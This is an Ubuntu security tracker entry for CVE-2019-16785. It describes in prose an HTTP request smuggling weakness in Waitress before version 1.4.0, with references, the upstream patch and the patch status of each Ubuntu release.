CVE-2019-16785 in Ubuntu

CVE-2019-16785

Priority

Description

Waitress through version 1.3.1 implemented a "MAY" part of the RFC7230
which states: "Although the line terminator for the start-line and header
fields is the sequence CRLF, a recipient MAY recognize a single LF as a
line terminator and ignore any preceding CR." Unfortunately if a front-end
server does not parse header fields with an LF the same way as it does
those with a CRLF it can lead to the front-end and the back-end server
parsing the same HTTP message in two different ways. This can lead to a
potential for HTTP request smuggling/splitting whereby Waitress may see two
requests while the front-end server only sees a single HTTP message. This
issue is fixed in Waitress 1.4.0.

References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16785
https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes
https://github.com/Pylons/waitress/security/advisories/GHSA-pg36-wpm5-g57p

Bugs

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947306

Notes

Package

Source: waitress (LP Ubuntu Debian)

Upstream:	released (1.4.0)
Ubuntu 18.04 LTS:	needed
Ubuntu 20.04 LTS:	not-affected (1.4.1-1)
Ubuntu 21.10:	not-affected (1.4.1-1)
Ubuntu 16.04 ESM:	needed
Ubuntu 22.04 LTS:	not-affected (1.4.1-1)
Ubuntu 14.04 ESM:	DNE

Patches:

Upstream:

https://github.com/Pylons/waitress/commit/8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba

More Information

Updated: 2022-04-25 00:37:47 UTC (commit ecc1009cb19540b950de59270950018900f37f15)